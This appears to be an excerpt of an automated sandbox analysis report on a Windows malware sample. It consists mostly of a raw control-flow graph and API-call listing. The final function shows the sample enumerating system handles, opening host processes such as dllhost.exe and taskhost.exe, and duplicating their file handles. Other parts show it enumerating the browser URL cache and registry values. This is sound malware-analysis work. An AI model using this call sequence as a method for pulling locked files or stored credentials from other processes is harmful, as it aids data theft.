38969 40440c 38374->38969 38375 40be26 wcsncmp 38375->38382 38378 40be7d memset 38379 40bea7 memcpy 38378->38379 38378->38382 38380 40bf11 wcschr 38379->38380 38379->38382 38380->38382 38381 40b2cc 27 API calls 38383 40bef6 _wcsnicmp 38381->38383 38382->38374 38382->38375 38382->38378 38382->38379 38382->38380 38382->38381 38384 40bf43 LocalFree 38382->38384 38972 40bd5d 28 API calls 38382->38972 38973 404423 38382->38973 38383->38380 38383->38382 38384->38382 38385 4135f7 38986 4135e0 38385->38986 38388 40b2cc 27 API calls 38389 41360d 38388->38389 38390 40a804 8 API calls 38389->38390 38391 413613 38390->38391 38392 41361b 38391->38392 38393 41363e 38391->38393 38395 40b273 27 API calls 38392->38395 38394 4135e0 FreeLibrary 38393->38394 38397 413643 38394->38397 38396 413625 GetProcAddress 38395->38396 38396->38393 38398 413648 38396->38398 38397->38158 38399 413658 38398->38399 38400 4135e0 FreeLibrary 38398->38400 38399->38158 38401 413666 38400->38401 38401->38158 38989 4449b9 38402->38989 38405 444c1f 38405->38138 38406 4449b9 42 API calls 38408 444b4b 38406->38408 38407 444c15 38410 4449b9 42 API calls 38407->38410 38408->38407 39010 444972 GetVersionExW 38408->39010 38410->38405 38411 444b99 memcmp 38416 444b8c 38411->38416 38412 444c0b 39014 444a85 42 API calls 38412->39014 38416->38411 38416->38412 39011 444aa5 42 API calls 38416->39011 39012 40a7a0 GetVersionExW 38416->39012 39013 444a85 42 API calls 38416->39013 38419 40399d 38418->38419 39015 403a16 38419->39015 38421 403a09 39029 40b1ab free free 38421->39029 38423 403a12 wcsrchr 38423->38145 38424 4039a3 38424->38421 38427 4039f4 38424->38427 39026 40a02c CreateFileW 38424->39026 38427->38421 38428 4099c6 2 API calls 38427->38428 38428->38421 38430 414c2e 14 API calls 38429->38430 38431 404048 38430->38431 38432 414c2e 14 API calls 38431->38432 38433 404056 38432->38433 38434 409d1f 6 API calls 38433->38434 38435 404073 38434->38435 38436 409d1f 6 API calls 38435->38436 38437 40408e 38436->38437 
38438 409d1f 6 API calls 38437->38438 38439 4040a6 38438->38439 38440 403af5 20 API calls 38439->38440 38441 4040ba 38440->38441 38442 403af5 20 API calls 38441->38442 38443 4040cb 38442->38443 39056 40414f memset 38443->39056 38445 4040e0 38446 404140 38445->38446 38448 4040ec memset 38445->38448 38450 4099c6 2 API calls 38445->38450 38451 40a8ab 9 API calls 38445->38451 39070 40b1ab free free 38446->39070 38448->38445 38449 404148 38449->38205 38450->38445 38451->38445 39083 40a6e6 WideCharToMultiByte 38452->39083 38454 4087ed 39084 4095d9 memset 38454->39084 38457 408809 memset memset memset memset memset 38458 40b2cc 27 API calls 38457->38458 38459 4088a1 38458->38459 38460 409d1f 6 API calls 38459->38460 38461 4088b1 38460->38461 38462 40b2cc 27 API calls 38461->38462 38463 4088c0 38462->38463 38464 409d1f 6 API calls 38463->38464 38465 4088d0 38464->38465 38466 40b2cc 27 API calls 38465->38466 38467 4088df 38466->38467 38468 409d1f 6 API calls 38467->38468 38469 4088ef 38468->38469 38470 40b2cc 27 API calls 38469->38470 38471 4088fe 38470->38471 38472 409d1f 6 API calls 38471->38472 38473 40890e 38472->38473 38474 40b2cc 27 API calls 38473->38474 38475 40891d 38474->38475 38476 409d1f 6 API calls 38475->38476 38477 40892d 38476->38477 39103 409b98 GetFileAttributesW 38477->39103 38479 40893e 38480 408943 38479->38480 38481 408958 38479->38481 39104 407fdf 75 API calls 38480->39104 39105 409b98 GetFileAttributesW 38481->39105 38484 408964 38485 408969 38484->38485 38486 40897b 38484->38486 39106 4082c7 198 API calls 38485->39106 39107 409b98 GetFileAttributesW 38486->39107 38489 408987 38490 4089a1 38489->38490 38491 40898c 38489->38491 39109 409b98 GetFileAttributesW 38490->39109 39108 408560 29 API calls 38491->39108 38494 4089ad 38495 4089b2 38494->38495 38496 4089c7 38494->38496 39111 409b98 GetFileAttributesW 38496->39111 38501 408953 38501->38205 38504 40b633 free 38503->38504 38505 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38504->38505 
38506 413f00 Process32NextW 38505->38506 38507 413da5 OpenProcess 38506->38507 38508 413f17 CloseHandle 38506->38508 38509 413df3 memset 38507->38509 38512 413eb0 38507->38512 38508->38248 39383 413f27 38509->39383 38511 413ebf free 38511->38512 38512->38506 38512->38511 38513 4099f4 3 API calls 38512->38513 38513->38512 38514 413e37 GetModuleHandleW 38516 413e46 GetProcAddress 38514->38516 38517 413e1f 38514->38517 38516->38517 38517->38514 39388 413959 38517->39388 39404 413ca4 38517->39404 38519 413ea2 CloseHandle 38519->38512 38521 414c2e 14 API calls 38520->38521 38522 403eb7 38521->38522 38523 414c2e 14 API calls 38522->38523 38524 403ec5 38523->38524 38525 409d1f 6 API calls 38524->38525 38526 403ee2 38525->38526 38527 409d1f 6 API calls 38526->38527 38528 403efd 38527->38528 38529 409d1f 6 API calls 38528->38529 38530 403f15 38529->38530 38531 403af5 20 API calls 38530->38531 38532 403f29 38531->38532 38533 403af5 20 API calls 38532->38533 38534 403f3a 38533->38534 38535 40414f 33 API calls 38534->38535 38536 403f4f 38535->38536 38537 403faf 38536->38537 38539 403f5b memset 38536->38539 38541 4099c6 2 API calls 38536->38541 38542 40a8ab 9 API calls 38536->38542 39418 40b1ab free free 38537->39418 38539->38536 38540 403fb7 38540->38188 38541->38536 38542->38536 38544 414c2e 14 API calls 38543->38544 38545 403d26 38544->38545 38546 414c2e 14 API calls 38545->38546 38547 403d34 38546->38547 38548 409d1f 6 API calls 38547->38548 38549 403d51 38548->38549 38550 409d1f 6 API calls 38549->38550 38551 403d6c 38550->38551 38552 409d1f 6 API calls 38551->38552 38553 403d84 38552->38553 38554 403af5 20 API calls 38553->38554 38555 403d98 38554->38555 38556 403af5 20 API calls 38555->38556 38557 403da9 38556->38557 38558 40414f 33 API calls 38557->38558 38564 403dbe 38558->38564 38559 403e1e 39419 40b1ab free free 38559->39419 38560 403dca memset 38560->38564 38562 403e26 38562->38203 38563 4099c6 2 API calls 38563->38564 38564->38559 38564->38560 38564->38563 38565 
40a8ab 9 API calls 38564->38565 38565->38564 38567 414b81 9 API calls 38566->38567 38568 414c40 38567->38568 38569 414c73 memset 38568->38569 39420 409cea 38568->39420 38573 414c94 38569->38573 38572 414c64 38572->38182 38574 414cf4 wcscpy 38573->38574 39423 414bb0 wcscpy 38573->39423 38574->38572 38576 414cd2 39424 4145ac RegQueryValueExW 38576->39424 38578 414ce9 38578->38574 38580 409d62 38579->38580 38581 409d43 wcscpy 38579->38581 38580->38225 38582 409719 2 API calls 38581->38582 38583 409d51 wcscat 38582->38583 38583->38580 38585 40aebe FindClose 38584->38585 38586 40ae21 38585->38586 38587 4099c6 2 API calls 38586->38587 38588 40ae35 38587->38588 38589 409d1f 6 API calls 38588->38589 38590 40ae49 38589->38590 38590->38265 38592 40ade0 38591->38592 38593 40ae0f 38591->38593 38592->38593 38594 40ade7 wcscmp 38592->38594 38593->38265 38594->38593 38595 40adfe wcscmp 38594->38595 38595->38593 38597 40ae18 9 API calls 38596->38597 38599 4453c4 38597->38599 38598 40ae51 9 API calls 38598->38599 38599->38598 38600 4453f3 38599->38600 38601 40add4 2 API calls 38599->38601 38604 445403 250 API calls 38599->38604 38602 40aebe FindClose 38600->38602 38601->38599 38603 4453fe 38602->38603 38603->38265 38604->38599 38606 40ae7b FindNextFileW 38605->38606 38607 40ae5c FindFirstFileW 38605->38607 38608 40ae94 38606->38608 38609 40ae8f 38606->38609 38607->38608 38611 40aeb6 38608->38611 38612 409d1f 6 API calls 38608->38612 38610 40aebe FindClose 38609->38610 38610->38608 38611->38265 38612->38611 38613->38177 38614->38157 38615->38251 38616->38234 38617->38234 38618->38266 38620 409c89 38619->38620 38620->38291 38621->38319 38623 413d39 38622->38623 38624 413d2f FreeLibrary 38622->38624 38625 40b633 free 38623->38625 38624->38623 38626 413d42 38625->38626 38627 40b633 free 38626->38627 38628 413d4a 38627->38628 38628->38147 38629->38150 38630->38195 38631->38218 38633 44db70 38632->38633 38634 40b6fc memset 38633->38634 38635 409c70 2 API calls 38634->38635 38636 40b732 
wcsrchr 38635->38636 38637 40b743 38636->38637 38638 40b746 memset 38636->38638 38637->38638 38639 40b2cc 27 API calls 38638->38639 38640 40b76f 38639->38640 38641 409d1f 6 API calls 38640->38641 38642 40b783 38641->38642 39425 409b98 GetFileAttributesW 38642->39425 38644 40b792 38645 40b7c2 38644->38645 38647 409c70 2 API calls 38644->38647 39426 40bb98 38645->39426 38649 40b7a5 38647->38649 38650 40b2cc 27 API calls 38649->38650 38653 40b7b2 38650->38653 38651 40b837 CloseHandle 38655 40b83e memset 38651->38655 38652 40b817 39460 409a45 GetTempPathW 38652->39460 38656 409d1f 6 API calls 38653->38656 39459 40a6e6 WideCharToMultiByte 38655->39459 38656->38645 38657 40b827 38657->38655 38659 40b866 38660 444432 120 API calls 38659->38660 38661 40b879 38660->38661 38662 40b273 27 API calls 38661->38662 38663 40bad5 38661->38663 38664 40b89a 38662->38664 38665 40b04b ??3@YAXPAX 38663->38665 38666 438552 133 API calls 38664->38666 38667 40baf3 38665->38667 38668 40b8a4 38666->38668 38667->38228 38669 40bacd 38668->38669 38671 4251c4 136 API calls 38668->38671 38670 443d90 110 API calls 38669->38670 38670->38663 38694 40b8b8 38671->38694 38672 40bac6 39472 424f26 122 API calls 38672->39472 38673 40b8bd memset 39463 425413 17 API calls 38673->39463 38676 425413 17 API calls 38676->38694 38679 40a71b MultiByteToWideChar 38679->38694 38680 40a734 MultiByteToWideChar 38680->38694 38683 40b9b5 memcmp 38683->38694 38684 4099c6 2 API calls 38684->38694 38685 404423 37 API calls 38685->38694 38688 4251c4 136 API calls 38688->38694 38689 40bb3e memset memcpy 39473 40a734 MultiByteToWideChar 38689->39473 38691 40bb88 LocalFree 38691->38694 38694->38672 38694->38673 38694->38676 38694->38679 38694->38680 38694->38683 38694->38684 38694->38685 38694->38688 38694->38689 38695 40ba5f memcmp 38694->38695 39464 4253ef 16 API calls 38694->39464 39465 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38694->39465 39466 4253af 17 API calls 38694->39466 39467 4253cf 17 API calls 
38694->39467 39468 447280 memset 38694->39468 39469 447960 memset memcpy memcpy memcpy 38694->39469 39470 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38694->39470 39471 447920 memcpy memcpy memcpy 38694->39471 38695->38694 38696->38230 38698 40aed1 38697->38698 38699 40aec7 FindClose 38697->38699 38698->38282 38699->38698 38701 4099d7 38700->38701 38702 4099da memcpy 38700->38702 38701->38702 38702->38204 38704 40b2cc 27 API calls 38703->38704 38705 44543f 38704->38705 38706 409d1f 6 API calls 38705->38706 38707 44544f 38706->38707 39562 409b98 GetFileAttributesW 38707->39562 38709 44545e 38710 445476 38709->38710 38712 40b6ef 249 API calls 38709->38712 38711 40b2cc 27 API calls 38710->38711 38713 445482 38711->38713 38712->38710 38714 409d1f 6 API calls 38713->38714 38715 445492 38714->38715 39563 409b98 GetFileAttributesW 38715->39563 38717 4454a1 38718 4454b9 38717->38718 38719 40b6ef 249 API calls 38717->38719 38718->38232 38719->38718 38720->38231 38721->38256 38722->38262 38723->38297 38724->38279 38725->38327 38726->38327 38727->38308 38728->38338 38729->38340 38730->38342 38732 414c2e 14 API calls 38731->38732 38733 40c2ae 38732->38733 38787 40c1d3 38733->38787 38738 40c3be 38755 40a8ab 38738->38755 38739 40afcf 2 API calls 38740 40c2fd FindFirstUrlCacheEntryW 38739->38740 38741 40c3b6 38740->38741 38742 40c31e wcschr 38740->38742 38743 40b04b ??3@YAXPAX 38741->38743 38744 40c331 38742->38744 38745 40c35e FindNextUrlCacheEntryW 38742->38745 38743->38738 38747 40a8ab 9 API calls 38744->38747 38745->38742 38746 40c373 GetLastError 38745->38746 38748 40c3ad FindCloseUrlCache 38746->38748 38749 40c37e 38746->38749 38750 40c33e wcschr 38747->38750 38748->38741 38751 40afcf 2 API calls 38749->38751 38750->38745 38752 40c34f 38750->38752 38754 40c391 FindNextUrlCacheEntryW 38751->38754 38753 40a8ab 9 API calls 38752->38753 38753->38745 38754->38742 38754->38748 38881 40a97a 38755->38881 38758 40a8cc 38758->38349 38887 40b1ab free free 38760->38887 38762 40c3dd 38763 
40b2cc 27 API calls 38762->38763 38764 40c3e7 38763->38764 38765 40c50e 38764->38765 38766 40c3ff 38764->38766 38780 405337 38765->38780 38767 40a9ce 4 API calls 38766->38767 38768 40c418 memset 38767->38768 38888 40aa1d 38768->38888 38771 40c471 38773 40c47a _wcsupr 38771->38773 38772 40c505 38772->38765 38890 40a8d0 7 API calls 38773->38890 38775 40c498 38891 40a8d0 7 API calls 38775->38891 38777 40c4ac memset 38778 40aa1d 38777->38778 38779 40c4e4 RegEnumValueW 38778->38779 38779->38772 38779->38773 38892 405220 38780->38892 38783->38360 38784->38362 38785->38363 38786->38356 38788 40ae18 9 API calls 38787->38788 38794 40c210 38788->38794 38789 40ae51 9 API calls 38789->38794 38790 40c264 38791 40aebe FindClose 38790->38791 38793 40c26f 38791->38793 38792 40add4 2 API calls 38792->38794 38799 40e5ed memset memset 38793->38799 38794->38789 38794->38790 38794->38792 38795 40c231 _wcsicmp 38794->38795 38797 40c1d3 34 API calls 38794->38797 38795->38794 38796 40c248 38795->38796 38812 40c084 21 API calls 38796->38812 38797->38794 38800 414c2e 14 API calls 38799->38800 38801 40e63f 38800->38801 38802 409d1f 6 API calls 38801->38802 38803 40e658 38802->38803 38813 409b98 GetFileAttributesW 38803->38813 38805 40e667 38806 409d1f 6 API calls 38805->38806 38808 40e680 38805->38808 38806->38808 38814 409b98 GetFileAttributesW 38808->38814 38809 40e68f 38810 40c2d8 38809->38810 38815 40e4b2 38809->38815 38810->38738 38810->38739 38812->38794 38813->38805 38814->38809 38836 40e01e 38815->38836 38817 40e593 38818 40e5b0 38817->38818 38819 40e59c DeleteFileW 38817->38819 38820 40b04b ??3@YAXPAX 38818->38820 38819->38818 38822 40e5bb 38820->38822 38821 40e521 38821->38817 38859 40e175 38821->38859 38824 40e5c4 CloseHandle 38822->38824 38825 40e5cc 38822->38825 38824->38825 38826 40b633 free 38825->38826 38828 40e5db 38826->38828 38827 40e573 38829 40e584 38827->38829 38830 40e57c CloseHandle 38827->38830 38832 40b633 free 38828->38832 38880 40b1ab free free 38829->38880 
38830->38829 38831 40e540 38831->38827 38879 40e2ab 30 API calls 38831->38879 38834 40e5e3 38832->38834 38834->38810 38837 406214 22 API calls 38836->38837 38838 40e03c 38837->38838 38839 40e16b 38838->38839 38840 40dd85 74 API calls 38838->38840 38839->38821 38841 40e06b 38840->38841 38841->38839 38842 40afcf ??2@YAPAXI ??3@YAXPAX 38841->38842 38843 40e08d OpenProcess 38842->38843 38844 40e0a4 GetCurrentProcess DuplicateHandle 38843->38844 38848 40e152 38843->38848 38845 40e0d0 GetFileSize 38844->38845 38846 40e14a CloseHandle 38844->38846 38849 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 38845->38849 38846->38848 38847 40e160 38851 40b04b ??3@YAXPAX 38847->38851 38848->38847 38850 406214 22 API calls 38848->38850 38852 40e0ea 38849->38852 38850->38847 38851->38839 38853 4096dc CreateFileW 38852->38853 38854 40e0f1 CreateFileMappingW 38853->38854 38855 40e140 CloseHandle CloseHandle 38854->38855 38856 40e10b MapViewOfFile 38854->38856 38855->38846 38857 40e13b CloseHandle 38856->38857 38858 40e11f WriteFile UnmapViewOfFile 38856->38858 38857->38855 38858->38857 38860 40e18c 38859->38860 38861 406b90 11 API calls 38860->38861 38862 40e19f 38861->38862 38863 40e1a7 memset 38862->38863 38864 40e299 38862->38864 38869 40e1e8 38863->38869 38865 4069a3 ??3@YAXPAX free 38864->38865 38866 40e2a4 38865->38866 38866->38831 38867 406e8f 13 API calls 38867->38869 38868 406b53 SetFilePointerEx ReadFile 38868->38869 38869->38867 38869->38868 38870 40e283 38869->38870 38871 40dd50 _wcsicmp 38869->38871 38875 40742e 8 API calls 38869->38875 38876 40aae3 wcslen wcslen _memicmp 38869->38876 38877 40e244 _snwprintf 38869->38877 38872 40e291 38870->38872 38873 40e288 free 38870->38873 38871->38869 38874 40aa04 free 38872->38874 38873->38872 38874->38864 38875->38869 38876->38869 38878 40a8d0 7 API calls 38877->38878 38878->38869 38879->38831 38880->38817 38882 40a980 38881->38882 38883 40a995 _wcsicmp 38882->38883 38884 40a99c wcscmp 38882->38884 38885 40a8bb 
38882->38885 38883->38882 38884->38882 38885->38758 38886 40a8d0 7 API calls 38885->38886 38886->38758 38887->38762 38889 40aa23 RegEnumValueW 38888->38889 38889->38771 38889->38772 38890->38775 38891->38777 38893 405335 38892->38893 38894 40522a 38892->38894 38893->38363 38895 40b2cc 27 API calls 38894->38895 38896 405234 38895->38896 38897 40a804 8 API calls 38896->38897 38898 40523a 38897->38898 38937 40b273 38898->38937 38900 405248 _mbscpy _mbscat GetProcAddress 38901 40b273 27 API calls 38900->38901 38902 405279 38901->38902 38940 405211 GetProcAddress 38902->38940 38904 405282 38905 40b273 27 API calls 38904->38905 38906 40528f 38905->38906 38941 405211 GetProcAddress 38906->38941 38908 405298 38909 40b273 27 API calls 38908->38909 38910 4052a5 38909->38910 38942 405211 GetProcAddress 38910->38942 38912 4052ae 38913 40b273 27 API calls 38912->38913 38914 4052bb 38913->38914 38943 405211 GetProcAddress 38914->38943 38916 4052c4 38917 40b273 27 API calls 38916->38917 38918 4052d1 38917->38918 38944 405211 GetProcAddress 38918->38944 38920 4052da 38921 40b273 27 API calls 38920->38921 38922 4052e7 38921->38922 38945 405211 GetProcAddress 38922->38945 38924 4052f0 38925 40b273 27 API calls 38924->38925 38926 4052fd 38925->38926 38946 405211 GetProcAddress 38926->38946 38928 405306 38929 40b273 27 API calls 38928->38929 38930 405313 38929->38930 38947 405211 GetProcAddress 38930->38947 38932 40531c 38933 40b273 27 API calls 38932->38933 38934 405329 38933->38934 38948 405211 GetProcAddress 38934->38948 38936 405332 38936->38893 38938 40b58d 27 API calls 38937->38938 38939 40b18c 38938->38939 38939->38900 38940->38904 38941->38908 38942->38912 38943->38916 38944->38920 38945->38924 38946->38928 38947->38932 38948->38936 38950 40440c FreeLibrary 38949->38950 38951 40436d 38950->38951 38952 40a804 8 API calls 38951->38952 38953 404377 38952->38953 38954 404383 38953->38954 38955 404405 38953->38955 38956 40b273 27 API calls 38954->38956 38955->38369 38955->38370 
38955->38374 38957 40438d GetProcAddress 38956->38957 38958 40b273 27 API calls 38957->38958 38959 4043a7 GetProcAddress 38958->38959 38960 40b273 27 API calls 38959->38960 38961 4043ba GetProcAddress 38960->38961 38962 40b273 27 API calls 38961->38962 38963 4043ce GetProcAddress 38962->38963 38964 40b273 27 API calls 38963->38964 38965 4043e2 GetProcAddress 38964->38965 38966 4043f1 38965->38966 38967 4043f7 38966->38967 38968 40440c FreeLibrary 38966->38968 38967->38955 38968->38955 38970 404413 FreeLibrary 38969->38970 38971 40441e 38969->38971 38970->38971 38971->38385 38972->38382 38974 40447e 38973->38974 38975 40442e 38973->38975 38974->38382 38976 40b2cc 27 API calls 38975->38976 38977 404438 38976->38977 38978 40a804 8 API calls 38977->38978 38979 40443e 38978->38979 38980 404445 38979->38980 38981 404467 38979->38981 38982 40b273 27 API calls 38980->38982 38981->38974 38984 404475 FreeLibrary 38981->38984 38983 40444f GetProcAddress 38982->38983 38983->38981 38985 404460 38983->38985 38984->38974 38985->38981 38987 4135f6 38986->38987 38988 4135eb FreeLibrary 38986->38988 38987->38388 38988->38987 38990 4449c4 38989->38990 38991 444a52 38989->38991 38992 40b2cc 27 API calls 38990->38992 38991->38405 38991->38406 38993 4449cb 38992->38993 38994 40a804 8 API calls 38993->38994 38995 4449d1 38994->38995 38996 40b273 27 API calls 38995->38996 38997 4449dc GetProcAddress 38996->38997 38998 40b273 27 API calls 38997->38998 38999 4449f3 GetProcAddress 38998->38999 39000 40b273 27 API calls 38999->39000 39001 444a04 GetProcAddress 39000->39001 39002 40b273 27 API calls 39001->39002 39003 444a15 GetProcAddress 39002->39003 39004 40b273 27 API calls 39003->39004 39005 444a26 GetProcAddress 39004->39005 39006 40b273 27 API calls 39005->39006 39007 444a37 GetProcAddress 39006->39007 39008 40b273 27 API calls 39007->39008 39009 444a48 GetProcAddress 39008->39009 39009->38991 39010->38416 39011->38416 39012->38416 39013->38416 39014->38407 39016 403a29 39015->39016 
39030 403bed memset memset 39016->39030 39018 403ae7 39043 40b1ab free free 39018->39043 39019 403a3f memset 39023 403a2f 39019->39023 39021 403aef 39021->38424 39022 409d1f 6 API calls 39022->39023 39023->39018 39023->39019 39023->39022 39024 409b98 GetFileAttributesW 39023->39024 39025 40a8d0 7 API calls 39023->39025 39024->39023 39025->39023 39027 40a051 GetFileTime CloseHandle 39026->39027 39028 4039ca CompareFileTime 39026->39028 39027->39028 39028->38424 39029->38423 39031 414c2e 14 API calls 39030->39031 39032 403c38 39031->39032 39033 409719 2 API calls 39032->39033 39034 403c3f wcscat 39033->39034 39035 414c2e 14 API calls 39034->39035 39036 403c61 39035->39036 39037 409719 2 API calls 39036->39037 39038 403c68 wcscat 39037->39038 39044 403af5 39038->39044 39041 403af5 20 API calls 39042 403c95 39041->39042 39042->39023 39043->39021 39045 403b02 39044->39045 39046 40ae18 9 API calls 39045->39046 39055 403b37 39046->39055 39047 403bdb 39049 40aebe FindClose 39047->39049 39048 40add4 wcscmp wcscmp 39048->39055 39050 403be6 39049->39050 39050->39041 39051 40a8d0 7 API calls 39051->39055 39052 40ae18 9 API calls 39052->39055 39053 40ae51 9 API calls 39053->39055 39054 40aebe FindClose 39054->39055 39055->39047 39055->39048 39055->39051 39055->39052 39055->39053 39055->39054 39057 409d1f 6 API calls 39056->39057 39058 404190 39057->39058 39071 409b98 GetFileAttributesW 39058->39071 39060 40419c 39061 4041a7 6 API calls 39060->39061 39062 40435c 39060->39062 39063 40424f 39061->39063 39062->38445 39063->39062 39065 40425e memset 39063->39065 39067 409d1f 6 API calls 39063->39067 39068 40a8ab 9 API calls 39063->39068 39072 414842 39063->39072 39065->39063 39066 404296 wcscpy 39065->39066 39066->39063 39067->39063 39069 4042b6 memset memset _snwprintf wcscpy 39068->39069 39069->39063 39070->38449 39071->39060 39075 41443e 39072->39075 39074 414866 39074->39063 39076 41444b 39075->39076 39077 414451 39076->39077 39078 4144a3 GetPrivateProfileStringW 39076->39078 
39079 414491 39077->39079 39080 414455 wcschr 39077->39080 39078->39074 39082 414495 WritePrivateProfileStringW 39079->39082 39080->39079 39081 414463 _snwprintf 39080->39081 39081->39082 39082->39074 39083->38454 39085 40b2cc 27 API calls 39084->39085 39086 409615 39085->39086 39087 409d1f 6 API calls 39086->39087 39088 409625 39087->39088 39113 409b98 GetFileAttributesW 39088->39113 39090 409634 39091 409648 39090->39091 39114 4091b8 memset 39090->39114 39093 40b2cc 27 API calls 39091->39093 39095 408801 39091->39095 39094 40965d 39093->39094 39096 409d1f 6 API calls 39094->39096 39095->38457 39095->38501 39097 40966d 39096->39097 39166 409b98 GetFileAttributesW 39097->39166 39099 40967c 39099->39095 39100 409681 39099->39100 39167 409529 72 API calls 39100->39167 39102 409690 39102->39095 39103->38479 39104->38501 39105->38484 39106->38501 39107->38489 39108->38490 39109->38494 39113->39090 39168 40a6e6 WideCharToMultiByte 39114->39168 39116 409202 39169 444432 39116->39169 39119 40b273 27 API calls 39120 409236 39119->39120 39215 438552 39120->39215 39123 409383 39125 40b273 27 API calls 39123->39125 39126 409399 39125->39126 39129 438552 133 API calls 39126->39129 39127 40937b 39240 424f26 122 API calls 39127->39240 39128 409254 39128->39127 39236 4253cf 17 API calls 39128->39236 39148 4093a3 39129->39148 39132 4094ff 39244 443d90 39132->39244 39133 409267 39237 4253cf 17 API calls 39133->39237 39136 4251c4 136 API calls 39136->39148 39137 409273 39238 4253af 17 API calls 39137->39238 39138 409507 39145 40951d 39138->39145 39264 408f2f 77 API calls 39138->39264 39140 4093df 39243 424f26 122 API calls 39140->39243 39141 40927f 39239 4253af 17 API calls 39141->39239 39142 4253cf 17 API calls 39142->39148 39145->39091 39147 40928b 39147->39127 39148->39132 39148->39136 39148->39140 39148->39142 39150 4093e4 39148->39150 39241 4253af 17 API calls 39150->39241 39156 4093ed 39242 4253af 17 API calls 39156->39242 39159 4093f9 39159->39140 39160 409409 memcmp 
(Control-flow graph edge list continued from the preceding function: raw node identifiers, basic-block addresses and the API names called from each block, as emitted by the Joe Sandbox IDA plugin; graph data only, not reproduced here.)

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 CloseHandle GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 354 40de5a 351->354 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 355 40de5d-40de63 354->355 357 40de74-40de78 355->357 358 40de65-40de6c 355->358 357->352 357->355 358->357 360 40de6e-40de71 358->360 360->357 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 372 40dff8-40dffb 370->372 373 40defd-40df02 370->373 371->370 374 40ded0-40dee1 _wcsicmp 371->374 372->363 375 40dffd-40e006 372->375 376 40df08 373->376 377 40dfef-40dff2 CloseHandle 373->377 374->370 374->375 375->362 375->363 378 40df0b-40df10 376->378 377->372 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 382 40df23-40df4a GetCurrentProcess DuplicateHandle 379->382 380->378 381 40dfd1-40dfd3 380->381 381->377 382->380 383 40df4c-40df76 memset call 41352f 382->383 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->377
                                                              APIs
                                                              • memset.MSVCRT ref: 0040DDAD
                                                                • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                              • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                              • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                              • CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                              • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                              • _wcsicmp.MSVCRT ref: 0040DEB2
                                                              • _wcsicmp.MSVCRT ref: 0040DEC5
                                                              • _wcsicmp.MSVCRT ref: 0040DED8
                                                              • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                              • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                              • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                              • memset.MSVCRT ref: 0040DF5F
                                                              • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                                              • _wcsicmp.MSVCRT ref: 0040DFB2
                                                              • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                                                              • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                              • API String ID: 708747863-3398334509
                                                              • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                              • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                              • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
